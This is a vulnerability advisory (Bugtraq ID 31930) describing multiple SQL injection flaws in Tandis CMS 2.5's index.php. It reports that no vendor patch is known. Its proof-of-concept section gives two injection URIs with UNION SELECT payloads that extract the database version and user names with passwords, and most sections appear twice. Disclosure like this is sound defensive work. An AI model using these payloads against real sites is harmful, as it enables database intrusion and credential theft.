Tandis CMS 'index.php' Multiple SQL Injection Vulnerabilities
BID:31930
Info
Tandis CMS 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 31930 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 27 2008 12:00AM |
| Updated: | Oct 27 2008 07:16PM |
| Credit: | G4N0K |
| Vulnerable: |
Tandis CMS Tandis CMS 2.5 |
| Not Vulnerable: | |
Discussion
Tandis CMS 'index.php' Multiple SQL Injection Vulnerabilities
Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.
Exploit / POC
Tandis CMS 'index.php' Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
Solution / Fix
Tandis CMS 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Tandis CMS 'index.php' Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (Tandis CMS)